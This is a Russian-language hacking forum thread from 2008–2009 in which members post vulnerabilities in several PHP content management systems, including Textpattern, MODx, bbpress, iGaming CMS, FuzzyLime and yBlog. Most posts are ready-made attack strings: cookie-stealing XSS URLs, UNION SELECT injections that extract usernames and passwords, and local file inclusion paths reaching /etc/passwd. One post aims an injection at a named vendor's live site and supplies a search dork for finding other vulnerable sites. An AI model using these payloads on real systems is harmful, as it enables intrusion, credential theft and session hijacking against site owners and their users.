HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 14.12.2008, 19:18
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567

Репутация: 2145


По умолчанию

Textpattern v.4.0.3

Passive XSS
Код:
http://localhost/textpattern/index.php?event=tag&name=image&id=1&ext=</textarea><script>alert(document.cookie)</script>&alt=&h=1&w=400&type=textile
Код:
http://localhost/textpattern/index.php?event=log&step=list&page=1<script>alert(document.cookie)</script>
Active XSS
Написать новую статью => http://localhost/textpattern/index.php?event=article => в заголовок вставляем код
Код:
<script>alert()</script> или </title><script>alert()</script>
Категории => уязвимо поле "Название".

Файлы => поле "Описание".

Ссылки => поля "Заголовок" и "Описание".

(c) iddqd

Последний раз редактировалось iddqd; 15.12.2008 в 13:38..
 
Ответить с цитированием

  #2  
Старый 19.12.2008, 19:50
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

MODx 0.9.6.2

Passive XSS
Код:
/assets/modules/docmanager/includes/tv.ajax.php
POST: tplID=-1&langNoTV=<body onLoad=alert('ok')>
Код:
/assets/plugins/tinymce3101/tinymce.linklist.php?list=<script>alert(/XSS/)</script>
register_globals ON
Код:
/assets/snippets/ditto/extenders/request.extender.inc.php?dbg=1&stripTags=0&ditto_<script>alert(/XSS/)</script>
register_globals ON
В этом случае забавно то, что XSS в имени параметра, а вот значение фильтруется жёстко.

Раскрытия путей
Код:
assets/cache/siteCache.idx.php

manager/includes/rss.inc.php
manager/includes/browsercheck.inc.php
manager/includes/sniff/phpSniff.class.php
manager/includes/extenders/getUserData.extender.php

assets/snippets/ditto/formats/xml.format.inc.php
assets/snippets/ditto/formats/rss.format.inc.php
assets/snippets/ditto/formats/json.format.inc.php
assets/snippets/ditto/classes/debug.class.inc.php
assets/snippets/ditto/formats/atom.format.inc.php
assets/snippets/ditto/extenders/tagging.extender.inc.php

manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php

assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/PSpell.php
assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/GoogleSpell.php
assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/EnchantSpell.php
assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/PSpellShell.php
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием

bbpress
  #3  
Старый 20.12.2008, 16:26
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию bbpress

bbpress v1.0


File:
realplay.php

Уязвимый кусок кода:

Код:
<?php
echo (get_magic_quotes_gpc() ? stripslashes($_GET['link']) : $_GET['link']);
?>
XSS иньекция:

Код:
http:/path/inc/realplay.php?link=%3Cscript%3Ealert(document.cooki e)%3C/script%3E


Активная XSS:



В /inc/realplay.php поле email вводим:

Код:
<script>alert()</script>

Последний раз редактировалось baltazar; 20.12.2008 в 16:28..
 
Ответить с цитированием

  #4  
Старый 20.12.2008, 22:30
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию

WorkingOnWeb

File: admin.inc.php

Уязвимый кусок кода:

Код:
$user = "";
$pass = "";
if (isset($_POST['loginname']) && $_POST['loginname'] != "")
$user = $_POST['loginname'];
if (isset($_POST['loginpass']) && $_POST['loginpass'] != "")
$pass = $_POST['loginpass'];
$loggedin = $this->loginuser($user, $pass);

SQL Иньекция:

Код:
http://path/articles/rss.php?category=-1/**/union/**/select/**/1,2,login,password/**/from/**/users/*

XSS иньекция:

Код:
http://path/wow/index.php/"><script>alert(document.cookie)</script>
 
Ответить с цитированием

  #5  
Старый 21.12.2008, 21:22
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию

iGaming CMS


Файл: lang.php
Уязвимый код:
Код:
if(isset($_GET['lang']))   

    $include_lang = $_GET['lang'];
}
elseif(file_exists(TOP_DIR.'/sql/db_connect.php'))
{
    include_once(TOP_DIR.'/functions/db_api.php');
    $include_lang = get_language();
}
else
{
    $include_lang = get_http_accept_lang();
}
include_once(TOP_DIR.'/lang/lang.'.$include_lang.'.php');
Код:
http://path/docs/index.php?lang=/../../../../../../../../../../test
Если magic_quotes_gpc = Off,тогда:

Код:
http://path/docs/index.php?lang=/../../../../../../../../../../etc/passwd%00
Файл: install.php


Уязвимый код:

Код:
switch($_GET['whatlang'])
{
case 1:
    include_once(TOP_DIR.'/lang/lang.'.@$_GET['language'].'.php');
    break;

    default:
    include_once(TOP_DIR.'/lang/lang.English.php');
    break;
}
Код:
http://path/install.php?whatlang=1&language=/../../../../../../../test
Если magic_quotes_gpc = Off,то:

Код:
http://path/install.php?whatlang=1&language=/../../../../../../../etc/passwd%00
SQL иньекция:

Код:
http://path/index.php?sideid=28+union+select+concat(username,0x3a,password),2,3+from+login/*
XSS иньекция:
Код:
http://path/search/?q=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E

Последний раз редактировалось baltazar; 22.12.2008 в 23:52..
 
Ответить с цитированием

  #6  
Старый 22.12.2008, 17:08
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию

Wheatblog


Файл: main.php
Кусок уязвимого кода:
Код:
$config = ereg_replace(":","", $config);

$config = trim(ereg_replace("../","", $config));

$config = trim(ereg_replace("/","", $config));

if (($config=="")|| (!eregi(".inc.php",$config))){$config="config.inc.php"; echo "<!--$config-->\n";}
Код:
http://path/main.php?config=eregi.inc.php\\..\\admin\\.htaccess
Если magic_quotes_gpc =ON,то:
Код:
http://path/main.php?config=eregi.inc.php\..\admin\.htaccess
XSS иньекция:

Код:
http://path/index.php?action=category&id=<script>alert(document.cookie)</script>
 
Ответить с цитированием

  #7  
Старый 23.12.2008, 19:22
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

&
p.w.p. author & author

charname_change.php:
Код:
...
$guid = addslashes($_GET["guid"]);
...
$sql = "SELECT guid, account, CAST(SUBSTRING_INDEX(SUBSTRING_INDEX(`data`, ' ', 1462), ' ', -1) AS UNSIGNED) AS `money`, name FROM characters WHERE guid=$guid AND account=$id";
...
mod spora author

guild.php:
Код:
...
$_GET['page'] = !isset($_GET['page'])?'guilds':$_GET['page'];
...
include("./module/".$_GET['page'].".php");
...
wow-ultimate author

gilds.php:
Код:
...
if (@$_GET['guid']) {
$guildid = addslashes($_GET['guid']);
...
$query_leader_name = $characters_db->query("SELECT * FROM `characters` WHERE `guid` IN (SELECT `guid` FROM `guild_member` WHERE `guildid`=".$guildid.") ORDER by `name`");
...
block-center.php:
Код:
<?php
if (!$menu = &$_GET['page']) 
$menu=$main_page;
print "<table align=\"center\" valign=\"top\" cellSpacing=\"0\" cellPadding=\"0\" width=\"100%\" border=\"0\" ><tr>
<td width=\"100%\" valign=\"top\" align=\"center\" >";
require_once("modules/$menu.php");
print "</td></tr></table>";
?>
MiniManager author
дофига скулей , cвн
 
Ответить с цитированием

  #8  
Старый 28.12.2008, 20:04
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

FGS_Studio cms
sql inj в параметре content_id
например на сайте производителя:
Цитата:
http://fgs.kiev.ua/index.php?lang_id=1&menu_id=1&&content_id=-1+union+select+1,2,3,4,5,6,7,concat(user,0x3c,user pass),9,10,11,load_file(0x3a)+from+user--+
исходники найти не удалось - колонки угадывались методом научного тыка).
dork:
Цитата:
inurl:lang_id= inurl:menu_id=
 
Ответить с цитированием

FuzzyLime CMS
  #9  
Старый 08.01.2009, 02:23
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию FuzzyLime CMS

FuzzyLime CMS

SQL Иньекция:

Код:
http://site/shop_showcat.php?='%20UNION%20ALL%20SELECT%201,2,3,4,5,6,concat(username,':',passwrd)%20from%20users/*
Локальный Инклуд:
Файл:index.php :
Уязвимый кусок кода:
Код:
<?php readfile($Root.$Path); ?> <---[xxx]
<form action="application_loader.php" method="post">
Код:
http://site/index.php?Root=../../../../../../etc/password
Код:
http://index.php?Path=../../../../../../etc/password

XSS:

Код:
http://site/login.php?url=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Последний раз редактировалось baltazar; 08.01.2009 в 20:24..
 
Ответить с цитированием

  #10  
Старый 08.01.2009, 20:39
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию

yBlog



Локальный Инклуд:



Файл:
pc.lib.php
Кусок уязвимого кода:

Код:
 if (!isset($g_pc_lib_dir))
    $g_pc_lib_dir = "lib";

...

  $g_pc_extension = "php";

  if (!defined("PCLERROR_LIB"))
  {
    include("data/inc/$g_pc_lib_dir/pclerror.lib.$g_pcltar_extension");
  }
  if (!defined("PCLTRACE_LIB"))
  {
    include("data/inc/$g_pc_lib_dir/pcltrace.lib.$g_pcltar_extension");
Код:
http://site/inc/lib/pc.lib.php?g_pc_lib_dir=../../../../../../../../../../../../../etc/passwd%00

SQL Иньекция:

Код:
http://site/search_results.php?cid=-1/**/union/**/select/**/1,version(),3,4,5,6--
XSS Иньекция:
Код:
http://site/yblog/user.php?n=<script>alert(/xss/)</script>
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ